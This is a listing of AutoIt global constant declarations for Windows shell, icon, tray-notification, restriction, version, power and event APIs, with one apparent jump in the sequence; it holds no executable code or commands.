$SE_ERR_DDETIMEOUT = 28 GLOBAL CONST $SE_ERR_DLLNOTFOUND = 32 GLOBAL CONST $SE_ERR_FNF = 2 GLOBAL CONST $SE_ERR_NOASSOC = 31 GLOBAL CONST $SE_ERR_OOM = 8 GLOBAL CONST $SE_ERR_PNF = 3 GLOBAL CONST $SE_ERR_SHARE = 26 GLOBAL CONST $FO_COPY = 2 GLOBAL CONST $FO_DELETE = 3 GLOBAL CONST $FO_MOVE = 1 GLOBAL CONST $FO_RENAME = 4 GLOBAL CONST $FOF_ALLOWUNDO = 64 GLOBAL CONST $FOF_CONFIRMMOUSE = 2 GLOBAL CONST $FOF_FILESONLY = 128 GLOBAL CONST $FOF_MULTIDESTFILES = 1 GLOBAL CONST $FOF_NOCONFIRMATION = 16 GLOBAL CONST $FOF_NOCONFIRMMKDIR = 512 GLOBAL CONST $FOF_NO_CONNECTED_ELEMENTS = 8192 GLOBAL CONST $FOF_NOCOPYSECURITYATTRIBS = 2048 GLOBAL CONST $FOF_NOERRORUI = 1024 GLOBAL CONST $FOF_NORECURSEREPARSE = 32768 GLOBAL CONST $FOF_NORECURSION = 4096 GLOBAL CONST $FOF_RENAMEONCOLLISION = 8 GLOBAL CONST $FOF_SILENT = 4 GLOBAL CONST $FOF_SIMPLEPROGRESS = 256 GLOBAL CONST $FOF_WANTMAPPINGHANDLE = 32 GLOBAL CONST $FOF_WANTNUKEWARNING = 16384 GLOBAL CONST $FOF_NO_UI = BITOR ($FOF_NOCONFIRMATION , $FOF_NOCONFIRMMKDIR , $FOF_NOERRORUI , $FOF_SILENT ) 
GLOBAL CONST $SHGFI_ADDOVERLAYS = 32 GLOBAL CONST $SHGFI_ATTR_SPECIFIED = 131072 GLOBAL CONST $SHGFI_ATTRIBUTES = 2048 GLOBAL CONST $SHGFI_DISPLAYNAME = 512 GLOBAL CONST $SHGFI_EXETYPE = 8192 GLOBAL CONST $SHGFI_ICON = 256 GLOBAL CONST $SHGFI_ICONLOCATION = 4096 GLOBAL CONST $SHGFI_LARGEICON = 0 GLOBAL CONST $SHGFI_LINKOVERLAY = 32768 GLOBAL CONST $SHGFI_OPENICON = 2 GLOBAL CONST $SHGFI_OVERLAYINDEX = 64 GLOBAL CONST $SHGFI_PIDL = 8 GLOBAL CONST $SHGFI_SELECTED = 65536 GLOBAL CONST $SHGFI_SHELLICONSIZE = 4 GLOBAL CONST $SHGFI_SMALLICON = 1 GLOBAL CONST $SHGFI_SYSICONINDEX = 16384 GLOBAL CONST $SHGFI_TYPENAME = 1024 GLOBAL CONST $SHGFI_USEFILEATTRIBUTES = 16 GLOBAL CONST $SFGAO_CANCOPY = 1 GLOBAL CONST $SFGAO_CANMOVE = 2 GLOBAL CONST $SFGAO_CANLINK = 4 GLOBAL CONST $SFGAO_STORAGE = 8 GLOBAL CONST $SFGAO_CANRENAME = 16 GLOBAL CONST $SFGAO_CANDELETE = 32 GLOBAL CONST $SFGAO_HASPROPSHEET = 64 GLOBAL CONST $SFGAO_DROPTARGET = 256 GLOBAL CONST $SFGAO_CAPABILITYMASK = BITOR ($SFGAO_CANCOPY , $SFGAO_CANMOVE , $SFGAO_CANLINK , $SFGAO_CANRENAME , $SFGAO_CANDELETE , $SFGAO_HASPROPSHEET , $SFGAO_DROPTARGET ) GLOBAL CONST $SFGAO_SYSTEM = 4096 GLOBAL CONST $SFGAO_ENCRYPTED = 8192 GLOBAL CONST $SFGAO_ISSLOW = 16384 GLOBAL CONST $SFGAO_GHOSTED = 32768 GLOBAL CONST $SFGAO_LINK = 65536 GLOBAL CONST $SFGAO_SHARE = 131072 GLOBAL CONST $SFGAO_READONLY = 262144 GLOBAL CONST $SFGAO_HIDDEN = 524288 GLOBAL CONST $SFGAO_DISPLAYATTRMASK = BITOR ($SFGAO_ISSLOW , $SFGAO_GHOSTED , $SFGAO_LINK , $SFGAO_SHARE , $SFGAO_READONLY , $SFGAO_HIDDEN ) GLOBAL CONST $SFGAO_NONENUMERATED = 1048576 GLOBAL CONST $SFGAO_NEWCONTENT = 2097152 GLOBAL CONST $SFGAO_STREAM = 4194304 GLOBAL CONST $SFGAO_STORAGEANCESTOR = 8388608 GLOBAL CONST $SFGAO_VALIDATE = 16777216 GLOBAL CONST $SFGAO_REMOVABLE = 33554432 GLOBAL CONST $SFGAO_COMPRESSED = 67108864 GLOBAL CONST $SFGAO_BROWSABLE = 134217728 GLOBAL CONST $SFGAO_FILESYSANCESTOR = 268435456 GLOBAL CONST $SFGAO_FOLDER = 536870912 GLOBAL CONST $SFGAO_FILESYSTEM = 
1073741824 GLOBAL CONST $SFGAO_STORAGECAPMASK = BITOR ($SFGAO_STORAGE , $SFGAO_LINK , $SFGAO_READONLY , $SFGAO_STREAM , $SFGAO_STORAGEANCESTOR , $SFGAO_FILESYSANCESTOR , $SFGAO_FOLDER , $SFGAO_FILESYSTEM ) GLOBAL CONST $SFGAO_HASSUBFOLDER = 2147483648 GLOBAL CONST $SFGAO_CONTENTSMASK = $SFGAO_HASSUBFOLDER GLOBAL CONST $SFGAO_PKEYSFGAOMASK = BITOR ($SFGAO_ISSLOW , $SFGAO_READONLY , $SFGAO_HASSUBFOLDER , $SFGAO_VALIDATE ) GLOBAL CONST $IDO_SHGIOI_DEFAULT = 268435452 GLOBAL CONST $IDO_SHGIOI_LINK = 268435454 GLOBAL CONST $IDO_SHGIOI_SHARE = 268435455 GLOBAL CONST $IDO_SHGIOI_SLOWFILE = 268435453 GLOBAL CONST $FCSM_VIEWID = 1 GLOBAL CONST $FCSM_WEBVIEWTEMPLATE = 2 GLOBAL CONST $FCSM_INFOTIP = 4 GLOBAL CONST $FCSM_CLSID = 8 GLOBAL CONST $FCSM_ICONFILE = 16 GLOBAL CONST $FCSM_LOGO = 32 GLOBAL CONST $FCSM_FLAGS = 64 GLOBAL CONST $FCS_READ = 1 GLOBAL CONST $FCS_FORCEWRITE = 2 GLOBAL CONST $FCS_WRITE = BITOR ($FCS_READ , $FCS_FORCEWRITE ) GLOBAL CONST $SSF_AUTOCHECKSELECT = 8388608 GLOBAL CONST $SSF_DESKTOPHTML = 512 GLOBAL CONST $SSF_DONTPRETTYPATH = 2048 GLOBAL CONST $SSF_DOUBLECLICKINWEBVIEW = 128 GLOBAL CONST $SSF_HIDEICONS = 16384 GLOBAL CONST $SSF_ICONSONLY = 16777216 GLOBAL CONST $SSF_MAPNETDRVBUTTON = 4096 GLOBAL CONST $SSF_NOCONFIRMRECYCLE = 32768 GLOBAL CONST $SSF_NONETCRAWLING = 1048576 GLOBAL CONST $SSF_SEPPROCESS = 524288 GLOBAL CONST $SSF_SHOWALLOBJECTS = 1 GLOBAL CONST $SSF_SHOWCOMPCOLOR = 8 GLOBAL CONST $SSF_SHOWEXTENSIONS = 2 GLOBAL CONST $SSF_SHOWINFOTIP = 8192 GLOBAL CONST $SSF_SHOWSUPERHIDDEN = 262144 GLOBAL CONST $SSF_SHOWSYSFILES = 32 GLOBAL CONST $SSF_SHOWTYPEOVERLAY = 33554432 GLOBAL CONST $SSF_STARTPANELON = 2097152 GLOBAL CONST $SSF_WIN95CLASSIC = 1024 GLOBAL CONST $SSF_WEBVIEW = 131072 GLOBAL CONST $CSIDL_ADMINTOOLS = 48 GLOBAL CONST $CSIDL_ALTSTARTUP = 29 GLOBAL CONST $CSIDL_APPDATA = 26 GLOBAL CONST $CSIDL_BITBUCKET = 10 GLOBAL CONST $CSIDL_CDBURN_AREA = 59 GLOBAL CONST $CSIDL_COMMON_ADMINTOOLS = 47 GLOBAL CONST $CSIDL_COMMON_ALTSTARTUP = 30 
GLOBAL CONST $CSIDL_COMMON_APPDATA = 35 GLOBAL CONST $CSIDL_COMMON_DESKTOPDIRECTORY = 25 GLOBAL CONST $CSIDL_COMMON_DOCUMENTS = 46 GLOBAL CONST $CSIDL_COMMON_FAVORITES = 31 GLOBAL CONST $CSIDL_COMMON_MUSIC = 53 GLOBAL CONST $CSIDL_COMMON_PICTURES = 54 GLOBAL CONST $CSIDL_COMMON_PROGRAMS = 23 GLOBAL CONST $CSIDL_COMMON_STARTMENU = 22 GLOBAL CONST $CSIDL_COMMON_STARTUP = 24 GLOBAL CONST $CSIDL_COMMON_TEMPLATES = 45 GLOBAL CONST $CSIDL_COMMON_VIDEO = 55 GLOBAL CONST $CSIDL_COMPUTERSNEARME = 61 GLOBAL CONST $CSIDL_CONNECTIONS = 49 GLOBAL CONST $CSIDL_CONTROLS = 3 GLOBAL CONST $CSIDL_COOKIES = 33 GLOBAL CONST $CSIDL_DESKTOP = 0 GLOBAL CONST $CSIDL_DESKTOPDIRECTORY = 16 GLOBAL CONST $CSIDL_DRIVES = 17 GLOBAL CONST $CSIDL_FAVORITES = 6 GLOBAL CONST $CSIDL_FONTS = 20 GLOBAL CONST $CSIDL_INTERNET_CACHE = 32 GLOBAL CONST $CSIDL_HISTORY = 34 GLOBAL CONST $CSIDL_LOCAL_APPDATA = 28 GLOBAL CONST $CSIDL_MYMUSIC = 13 GLOBAL CONST $CSIDL_MYPICTURES = 39 GLOBAL CONST $CSIDL_MYVIDEO = 14 GLOBAL CONST $CSIDL_NETHOOD = 19 GLOBAL CONST $CSIDL_PERSONAL = 5 GLOBAL CONST $CSIDL_PRINTERS = 4 GLOBAL CONST $CSIDL_PRINTHOOD = 27 GLOBAL CONST $CSIDL_PROFILE = 40 GLOBAL CONST $CSIDL_PROGRAM_FILES = 38 GLOBAL CONST $CSIDL_PROGRAM_FILES_COMMON = 43 GLOBAL CONST $CSIDL_PROGRAM_FILES_COMMONX86 = 44 GLOBAL CONST $CSIDL_PROGRAM_FILESX86 = 42 GLOBAL CONST $CSIDL_PROGRAMS = 2 GLOBAL CONST $CSIDL_RECENT = 8 GLOBAL CONST $CSIDL_SENDTO = 9 GLOBAL CONST $CSIDL_STARTMENU = 11 GLOBAL CONST $CSIDL_STARTUP = 7 GLOBAL CONST $CSIDL_SYSTEM = 37 GLOBAL CONST $CSIDL_SYSTEMX86 = 41 GLOBAL CONST $CSIDL_TEMPLATES = 21 GLOBAL CONST $CSIDL_WINDOWS = 36 GLOBAL CONST $SIID_DOCNOASSOC = 0 GLOBAL CONST $SIID_DOCASSOC = 1 GLOBAL CONST $SIID_APPLICATION = 2 GLOBAL CONST $SIID_FOLDER = 3 GLOBAL CONST $SIID_FOLDEROPEN = 4 GLOBAL CONST $SIID_DRIVE525 = 5 GLOBAL CONST $SIID_DRIVE35 = 6 GLOBAL CONST $SIID_DRIVEREMOVE = 7 GLOBAL CONST $SIID_DRIVEFIXED = 8 GLOBAL CONST $SIID_DRIVENET = 9 GLOBAL CONST $SIID_DRIVENETDISABLED = 10 
GLOBAL CONST $SIID_DRIVECD = 11 GLOBAL CONST $SIID_DRIVERAM = 12 GLOBAL CONST $SIID_WORLD = 13 GLOBAL CONST $SIID_SERVER = 15 GLOBAL CONST $SIID_PRINTER = 16 GLOBAL CONST $SIID_MYNETWORK = 17 GLOBAL CONST $SIID_FIND = 22 GLOBAL CONST $SIID_HELP = 23 GLOBAL CONST $SIID_SHARE = 28 GLOBAL CONST $SIID_LINK = 29 GLOBAL CONST $SIID_SLOWFILE = 30 GLOBAL CONST $SIID_RECYCLER = 31 GLOBAL CONST $SIID_RECYCLERFULL = 32 GLOBAL CONST $SIID_MEDIACDAUDIO = 40 GLOBAL CONST $SIID_LOCK = 47 GLOBAL CONST $SIID_AUTOLIST = 49 GLOBAL CONST $SIID_PRINTERNET = 50 GLOBAL CONST $SIID_SERVERSHARE = 51 GLOBAL CONST $SIID_PRINTERFAX = 52 GLOBAL CONST $SIID_PRINTERFAXNET = 53 GLOBAL CONST $SIID_PRINTERFILE = 54 GLOBAL CONST $SIID_STACK = 55 GLOBAL CONST $SIID_MEDIASVCD = 56 GLOBAL CONST $SIID_STUFFEDFOLDER = 57 GLOBAL CONST $SIID_DRIVEUNKNOWN = 58 GLOBAL CONST $SIID_DRIVEDVD = 59 GLOBAL CONST $SIID_MEDIADVD = 60 GLOBAL CONST $SIID_MEDIADVDRAM = 61 GLOBAL CONST $SIID_MEDIADVDRW = 62 GLOBAL CONST $SIID_MEDIADVDR = 63 GLOBAL CONST $SIID_MEDIADVDROM = 64 GLOBAL CONST $SIID_MEDIACDAUDIOPLUS = 65 GLOBAL CONST $SIID_MEDIACDRW = 66 GLOBAL CONST $SIID_MEDIACDR = 67 GLOBAL CONST $SIID_MEDIACDBURN = 68 GLOBAL CONST $SIID_MEDIABLANKCD = 69 GLOBAL CONST $SIID_MEDIACDROM = 70 GLOBAL CONST $SIID_AUDIOFILES = 71 GLOBAL CONST $SIID_IMAGEFILES = 72 GLOBAL CONST $SIID_VIDEOFILES = 73 GLOBAL CONST $SIID_MIXEDFILES = 74 GLOBAL CONST $SIID_FOLDERBACK = 75 GLOBAL CONST $SIID_FOLDERFRONT = 76 GLOBAL CONST $SIID_SHIELD = 77 GLOBAL CONST $SIID_WARNING = 78 GLOBAL CONST $SIID_INFO = 79 GLOBAL CONST $SIID_ERROR = 80 GLOBAL CONST $SIID_KEY = 81 GLOBAL CONST $SIID_SOFTWARE = 82 GLOBAL CONST $SIID_RENAME = 83 GLOBAL CONST $SIID_DELETE = 84 GLOBAL CONST $SIID_MEDIAAUDIODVD = 85 GLOBAL CONST $SIID_MEDIAMOVIEDVD = 86 GLOBAL CONST $SIID_MEDIAENHANCEDCD = 87 GLOBAL CONST $SIID_MEDIAENHANCEDDVD = 88 GLOBAL CONST $SIID_MEDIAHDDVD = 89 GLOBAL CONST $SIID_MEDIABLURAY = 90 GLOBAL CONST $SIID_MEDIAVCD = 91 GLOBAL CONST 
$SIID_MEDIADVDPLUSR = 92 GLOBAL CONST $SIID_MEDIADVDPLUSRW = 93 GLOBAL CONST $SIID_DESKTOPPC = 94 GLOBAL CONST $SIID_MOBILEPC = 95 GLOBAL CONST $SIID_USERS = 96 GLOBAL CONST $SIID_MEDIASMARTMEDIA = 97 GLOBAL CONST $SIID_MEDIACOMPACTFLASH = 98 GLOBAL CONST $SIID_DEVICECELLPHONE = 99 GLOBAL CONST $SIID_DEVICECAMERA = 100 GLOBAL CONST $SIID_DEVICEVIDEOCAMERA = 101 GLOBAL CONST $SIID_DEVICEAUDIOPLAYER = 102 GLOBAL CONST $SIID_NETWORKCONNECT = 103 GLOBAL CONST $SIID_INTERNET = 104 GLOBAL CONST $SIID_ZIPFILE = 105 GLOBAL CONST $SIID_SETTINGS = 106 GLOBAL CONST $SIID_DRIVEHDDVD = 132 GLOBAL CONST $SIID_DRIVEBD = 133 GLOBAL CONST $SIID_MEDIAHDDVDROM = 134 GLOBAL CONST $SIID_MEDIAHDDVDR = 135 GLOBAL CONST $SIID_MEDIAHDDVDRAM = 136 GLOBAL CONST $SIID_MEDIABDROM = 137 GLOBAL CONST $SIID_MEDIABDR = 138 GLOBAL CONST $SIID_MEDIABDRE = 139 GLOBAL CONST $SIID_CLUSTEREDDRIVE = 140 GLOBAL CONST $SIID_MAX_ICONS = 174 GLOBAL CONST $SHGSI_ICONLOCATION = 0 GLOBAL CONST $SHGSI_ICON = $SHGFI_ICON GLOBAL CONST $SHGSI_SYSICONINDEX = $SHGFI_SYSICONINDEX GLOBAL CONST $SHGSI_LINKOVERLAY = $SHGFI_LINKOVERLAY GLOBAL CONST $SHGSI_SELECTED = $SHGFI_SELECTED GLOBAL CONST $SHGSI_LARGEICON = $SHGFI_LARGEICON GLOBAL CONST $SHGSI_SMALLICON = $SHGFI_SMALLICON GLOBAL CONST $SHGSI_SHELLICONSIZE = $SHGFI_SHELLICONSIZE GLOBAL CONST $NIM_ADD = 0 GLOBAL CONST $NIM_MODIFY = 1 GLOBAL CONST $NIM_DELETE = 2 GLOBAL CONST $NIM_SETFOCUS = 3 GLOBAL CONST $NIM_SETVERSION = 4 GLOBAL CONST $NIF_MESSAGE = 1 GLOBAL CONST $NIF_ICON = 2 GLOBAL CONST $NIF_TIP = 4 GLOBAL CONST $NIF_STATE = 8 GLOBAL CONST $NIF_INFO = 16 GLOBAL CONST $NIF_GUID = 32 GLOBAL CONST $NIF_REALTIME = 64 GLOBAL CONST $NIF_SHOWTIP = 128 GLOBAL CONST $NIS_HIDDEN = 1 GLOBAL CONST $NIS_SHAREDICON = 2 GLOBAL CONST $NIIF_NONE = 0 GLOBAL CONST $NIIF_INFO = 1 GLOBAL CONST $NIIF_WARNING = 2 GLOBAL CONST $NIIF_ERROR = 3 GLOBAL CONST $NIIF_USER = 4 GLOBAL CONST $NIIF_NOSOUND = 16 GLOBAL CONST $NIIF_LARGE_ICON = 16 GLOBAL CONST $NIIF_RESPECT_QUIET_TIME = 128 
GLOBAL CONST $NIIF_ICON_MASK = 15 GLOBAL CONST $SHOP_PRINTERNAME = 1 GLOBAL CONST $SHOP_FILEPATH = 2 GLOBAL CONST $SHOP_VOLUMEGUID = 4 GLOBAL CONST $OFASI_EDIT = 1 GLOBAL CONST $OFASI_OPENDESKTOP = 2 GLOBAL CONST $QUNS_NOT_PRESENT = 1 GLOBAL CONST $QUNS_BUSY = 2 GLOBAL CONST $QUNS_RUNNING_D3D_FULL_SCREEN = 3 GLOBAL CONST $QUNS_PRESENTATION_MODE = 4 GLOBAL CONST $QUNS_ACCEPTS_NOTIFICATIONS = 5 GLOBAL CONST $QUNS_QUIET_TIME = 6 GLOBAL CONST $REST_NORUN = 1 GLOBAL CONST $REST_NOCLOSE = 2 GLOBAL CONST $REST_NOSAVESET = 3 GLOBAL CONST $REST_NOFILEMENU = 4 GLOBAL CONST $REST_NOSETFOLDERS = 5 GLOBAL CONST $REST_NOSETTASKBAR = 6 GLOBAL CONST $REST_NODESKTOP = 7 GLOBAL CONST $REST_NOFIND = 8 GLOBAL CONST $REST_NODRIVES = 9 GLOBAL CONST $REST_NODRIVEAUTORUN = 10 GLOBAL CONST $REST_NODRIVETYPEAUTORUN = 11 GLOBAL CONST $REST_NONETHOOD = 12 GLOBAL CONST $REST_STARTBANNER = 13 GLOBAL CONST $REST_RESTRICTRUN = 14 GLOBAL CONST $REST_NOPRINTERTABS = 15 GLOBAL CONST $REST_NOPRINTERDELETE = 16 GLOBAL CONST $REST_NOPRINTERADD = 17 GLOBAL CONST $REST_NOSTARTMENUSUBFOLDERS = 18 GLOBAL CONST $REST_MYDOCSONNET = 19 GLOBAL CONST $REST_NOEXITTODOS = 20 GLOBAL CONST $REST_ENFORCESHELLEXTSECURITY = 21 GLOBAL CONST $REST_LINKRESOLVEIGNORELINKINFO = 22 GLOBAL CONST $REST_NOCOMMONGROUPS = 23 GLOBAL CONST $REST_SEPARATEDESKTOPPROCESS = 24 GLOBAL CONST $REST_NOWEB = 25 GLOBAL CONST $REST_NOTRAYCONTEXTMENU = 26 GLOBAL CONST $REST_NOVIEWCONTEXTMENU = 27 GLOBAL CONST $REST_NONETCONNECTDISCONNECT = 28 GLOBAL CONST $REST_STARTMENULOGOFF = 29 GLOBAL CONST $REST_NOSETTINGSASSIST = 30 GLOBAL CONST $REST_NOINTERNETICON = 31 GLOBAL CONST $REST_NORECENTDOCSHISTORY = 32 GLOBAL CONST $REST_NORECENTDOCSMENU = 33 GLOBAL CONST $REST_NOACTIVEDESKTOP = 34 GLOBAL CONST $REST_NOACTIVEDESKTOPCHANGES = 35 GLOBAL CONST $REST_NOFAVORITESMENU = 36 GLOBAL CONST $REST_CLEARRECENTDOCSONEXIT = 37 GLOBAL CONST $REST_CLASSICSHELL = 38 GLOBAL CONST $REST_NOCUSTOMIZEWEBVIEW = 39 GLOBAL CONST $REST_NOHTMLWALLPAPER = 40 GLOBAL 
CONST $REST_NOCHANGINGWALLPAPER = 41 GLOBAL CONST $REST_NODESKCOMP = 42 GLOBAL CONST $REST_NOADDDESKCOMP = 43 GLOBAL CONST $REST_NODELDESKCOMP = 44 GLOBAL CONST $REST_NOCLOSEDESKCOMP = 45 GLOBAL CONST $REST_NOCLOSE_DRAGDROPBAND = 46 GLOBAL CONST $REST_NOMOVINGBAND = 47 GLOBAL CONST $REST_NOEDITDESKCOMP = 48 GLOBAL CONST $REST_NORESOLVESEARCH = 49 GLOBAL CONST $REST_NORESOLVETRACK = 50 GLOBAL CONST $REST_FORCECOPYACLWITHFILE = 51 GLOBAL CONST $REST_NOLOGO3CHANNELNOTIFY = 52 GLOBAL CONST $REST_NOFORGETSOFTWAREUPDATE = 53 GLOBAL CONST $REST_NOSETACTIVEDESKTOP = 54 GLOBAL CONST $REST_NOUPDATEWINDOWS = 55 GLOBAL CONST $REST_NOCHANGESTARMENU = 56 GLOBAL CONST $REST_NOFOLDEROPTIONS = 57 GLOBAL CONST $REST_HASFINDCOMPUTERS = 58 GLOBAL CONST $REST_INTELLIMENUS = 59 GLOBAL CONST $REST_RUNDLGMEMCHECKBOX = 60 GLOBAL CONST $REST_ARP_SHOWPOSTSETUP = 61 GLOBAL CONST $REST_NOCSC = 62 GLOBAL CONST $REST_NOCONTROLPANEL = 63 GLOBAL CONST $REST_ENUMWORKGROUP = 64 GLOBAL CONST $REST_ARP_NOARP = 65 GLOBAL CONST $REST_ARP_NOREMOVEPAGE = 66 GLOBAL CONST $REST_ARP_NOADDPAGE = 67 GLOBAL CONST $REST_ARP_NOWINSETUPPAGE = 68 GLOBAL CONST $REST_GREYMSIADS = 69 GLOBAL CONST $REST_NOCHANGEMAPPEDDRIVELABEL = 70 GLOBAL CONST $REST_NOCHANGEMAPPEDDRIVECOMMENT = 71 GLOBAL CONST $REST_MAXRECENTDOCS = 72 GLOBAL CONST $REST_NONETWORKCONNECTIONS = 73 GLOBAL CONST $REST_FORCESTARTMENULOGOFF = 74 GLOBAL CONST $REST_NOWEBVIEW = 75 GLOBAL CONST $REST_NOCUSTOMIZETHISFOLDER = 76 GLOBAL CONST $REST_NOENCRYPTION = 77 GLOBAL CONST $REST_DONTSHOWSUPERHIDDEN = 78 GLOBAL CONST $REST_NOSHELLSEARCHBUTTON = 79 GLOBAL CONST $REST_NOHARDWARETAB = 80 GLOBAL CONST $REST_NORUNASINSTALLPROMPT = 81 GLOBAL CONST $REST_PROMPTRUNASINSTALLNETPATH = 82 GLOBAL CONST $REST_NOMANAGEMYCOMPUTERVERB = 83 GLOBAL CONST $REST_NORECENTDOCSNETHOOD = 84 GLOBAL CONST $REST_DISALLOWRUN = 85 GLOBAL CONST $REST_NOWELCOMESCREEN = 86 GLOBAL CONST $REST_RESTRICTCPL = 87 GLOBAL CONST $REST_DISALLOWCPL = 88 GLOBAL CONST $REST_NOSMBALLOONTIP = 89 GLOBAL 
GLOBAL CONST $VER_SUITE_PERSONAL = 512 GLOBAL CONST $VER_SUITE_SINGLEUSERTS = 256 GLOBAL CONST $VER_SUITE_SMALLBUSINESS = 1 GLOBAL CONST $VER_SUITE_SMALLBUSINESS_RESTRICTED = 32 GLOBAL CONST $VER_SUITE_STORAGE_SERVER = 8192 GLOBAL CONST $VER_SUITE_TERMINAL = 16 GLOBAL CONST $VER_SUITE_WH_SERVER = 32768 GLOBAL CONST $VER_NT_DOMAIN_CONTROLLER = 2 GLOBAL CONST $VER_NT_SERVER = 3 GLOBAL CONST $VER_NT_WORKSTATION = 1 GLOBAL CONST $WDA_MONITOR = 1 GLOBAL CONST $WDA_NONE = 0 GLOBAL CONST $PF_3DNOW_INSTRUCTIONS_AVAILABLE = 7 GLOBAL CONST $PF_CHANNELS_ENABLED = 16 GLOBAL CONST $PF_COMPARE_EXCHANGE_DOUBLE = 2 GLOBAL CONST $PF_COMPARE_EXCHANGE128 = 14 GLOBAL CONST $PF_COMPARE64_EXCHANGE128 = 15 GLOBAL CONST $PF_FLOATING_POINT_EMULATED = 1 GLOBAL CONST $PF_FLOATING_POINT_PRECISION_ERRATA = 0 GLOBAL CONST $PF_MMX_INSTRUCTIONS_AVAILABLE = 3 GLOBAL CONST $PF_NX_ENABLED = 12 GLOBAL CONST $PF_PAE_ENABLED = 9 GLOBAL CONST $PF_RDTSC_INSTRUCTION_AVAILABLE = 8 GLOBAL CONST $PF_SSE3_INSTRUCTIONS_AVAILABLE = 13 GLOBAL CONST $PF_XMMI_INSTRUCTIONS_AVAILABLE = 6 GLOBAL CONST $PF_XMMI64_INSTRUCTIONS_AVAILABLE = 10 GLOBAL CONST $PF_XSAVE_ENABLED = 17 GLOBAL CONST $KEYEVENTF_EXTENDEDKEY = 1 GLOBAL CONST $KEYEVENTF_KEYUP = 2 GLOBAL CONST $LIM_SMALL = 0 GLOBAL CONST $LIM_LARGE = 1 GLOBAL CONST $MAPVK_VK_TO_CHAR = 2 GLOBAL CONST $MAPVK_VK_TO_VSC = 0 GLOBAL CONST $MAPVK_VK_TO_VSC_EX = 4 GLOBAL CONST $MAPVK_VSC_TO_VK = 1 GLOBAL CONST $MAPVK_VSC_TO_VK_EX = 3 GLOBAL CONST $MOD_ALT = 1 GLOBAL CONST $MOD_CONTROL = 2 GLOBAL CONST $MOD_NOREPEAT = 16384 GLOBAL CONST $MOD_SHIFT = 4 GLOBAL CONST $MOD_WIN = 8 GLOBAL CONST $GUID_ACDC_POWER_SOURCE = "{5D3E9A59-E9D5-4B00-A6BD-FF34FF516548}" GLOBAL CONST $GUID_BATTERY_PERCENTAGE_REMAINING = "{A7AD8041-B45A-4CAE-87A3-EECBB468A9E1}" GLOBAL CONST $GUID_IDLE_BACKGROUND_TASK = "{515C31D8-F734-163D-A0FD-11A08C91E8F1}" GLOBAL CONST $GUID_MONITOR_POWER_ON = "{02731015-4510-4526-99E6-E5A17EBD1AEA}" GLOBAL CONST $GUID_POWERSCHEME_PERSONALITY = 
"{245D8541-3943-4422-B025-13A784F679B7}" GLOBAL CONST $GUID_SYSTEM_AWAYMODE = "{98A7F580-01F7-48AA-9C0F-44352C29E5C0}" GLOBAL CONST $GUID_MIN_POWER_SAVINGS = "{8C5E7FDA-E8BF-4A96-9A85-A6E23A8C635C}" GLOBAL CONST $GUID_MAX_POWER_SAVINGS = "{A1841308-3541-4FAB-BC81-F71556F20B4A}" GLOBAL CONST $GUID_TYPICAL_POWER_SAVINGS = "{381B4222-F694-41F0-9685-FF5BB260DF2E}" GLOBAL CONST $HSHELL_WINDOWCREATED = 1 GLOBAL CONST $HSHELL_WINDOWDESTROYED = 2 GLOBAL CONST $HSHELL_ACTIVATESHELLWINDOW = 3 GLOBAL CONST $HSHELL_WINDOWACTIVATED = 4 GLOBAL CONST $HSHELL_GETMINRECT = 5 GLOBAL CONST $HSHELL_REDRAW = 6 GLOBAL CONST $HSHELL_TASKMAN = 7 GLOBAL CONST $HSHELL_LANGUAGE = 8 GLOBAL CONST $HSHELL_SYSMENU = 9 GLOBAL CONST $HSHELL_ENDTASK = 10 GLOBAL CONST $HSHELL_ACCESSIBILITYSTATE = 11 GLOBAL CONST $HSHELL_APPCOMMAND = 12 GLOBAL CONST $HSHELL_WINDOWREPLACED = 13 GLOBAL CONST $HSHELL_WINDOWREPLACING = 14 GLOBAL CONST $HSHELL_RUDEAPPACTIVATED = 32772 GLOBAL CONST $HSHELL_FLASH = 32774 GLOBAL CONST $HWND_BROADCAST = 65535 GLOBAL CONST $SMTO_BLOCK = 1 GLOBAL CONST $SMTO_NORMAL = 0 GLOBAL CONST $SMTO_ABORTIFHUNG = 2 GLOBAL CONST $SMTO_NOTIMEOUTIFNOTHUNG = 8 GLOBAL CONST $SMTO_ERRORONEXIT = 32 GLOBAL CONST $INPUTLANGCHANGE_BACKWARD = 4 GLOBAL CONST $INPUTLANGCHANGE_FORWARD = 2 GLOBAL CONST $INPUTLANGCHANGE_SYSCHARSET = 1 GLOBAL CONST $EVENT_MIN = 1 GLOBAL CONST $EVENT_SYSTEM_SOUND = 1 GLOBAL CONST $EVENT_SYSTEM_ALERT = 2 GLOBAL CONST $EVENT_SYSTEM_FOREGROUND = 3 GLOBAL CONST $EVENT_SYSTEM_MENUSTART = 4 GLOBAL CONST $EVENT_SYSTEM_MENUEND = 5 GLOBAL CONST $EVENT_SYSTEM_MENUPOPUPSTART = 6 GLOBAL CONST $EVENT_SYSTEM_MENUPOPUPEND = 7 GLOBAL CONST $EVENT_SYSTEM_CAPTURESTART = 8 GLOBAL CONST $EVENT_SYSTEM_CAPTUREEND = 9 GLOBAL CONST $EVENT_SYSTEM_MOVESIZESTART = 10 GLOBAL CONST $EVENT_SYSTEM_MOVESIZEEND = 11 GLOBAL CONST $EVENT_SYSTEM_CONTEXTHELPSTART = 12 GLOBAL CONST $EVENT_SYSTEM_CONTEXTHELPEND = 13 GLOBAL CONST $EVENT_SYSTEM_DRAGDROPSTART = 14 GLOBAL CONST $EVENT_SYSTEM_DRAGDROPEND = 15 GLOBAL 
CONST $EVENT_SYSTEM_DIALOGSTART = 16 GLOBAL CONST $EVENT_SYSTEM_DIALOGEND = 17 GLOBAL CONST $EVENT_SYSTEM_SCROLLINGSTART = 18 GLOBAL CONST $EVENT_SYSTEM_SCROLLINGEND = 19 GLOBAL CONST $EVENT_SYSTEM_SWITCHSTART = 20 GLOBAL CONST $EVENT_SYSTEM_SWITCHEND = 21 GLOBAL CONST $EVENT_SYSTEM_MINIMIZESTART = 22 GLOBAL CONST $EVENT_SYSTEM_MINIMIZEEND = 23 GLOBAL CONST $EVENT_SYSTEM_DESKTOPSWITCH = 32 GLOBAL CONST $EVENT_OBJECT_CREATE = 32768 GLOBAL CONST $EVENT_OBJECT_DESTROY = 32769 GLOBAL CONST $EVENT_OBJECT_SHOW = 32770 GLOBAL CONST $EVENT_OBJECT_HIDE = 32771 GLOBAL CONST $EVENT_OBJECT_REORDER = 32772 GLOBAL CONST $EVENT_OBJECT_FOCUS = 32773 GLOBAL CONST $EVENT_OBJECT_SELECTION = 32774 GLOBAL CONST $EVENT_OBJECT_SELECTIONADD = 32775 GLOBAL CONST $EVENT_OBJECT_SELECTIONREMOVE = 32776 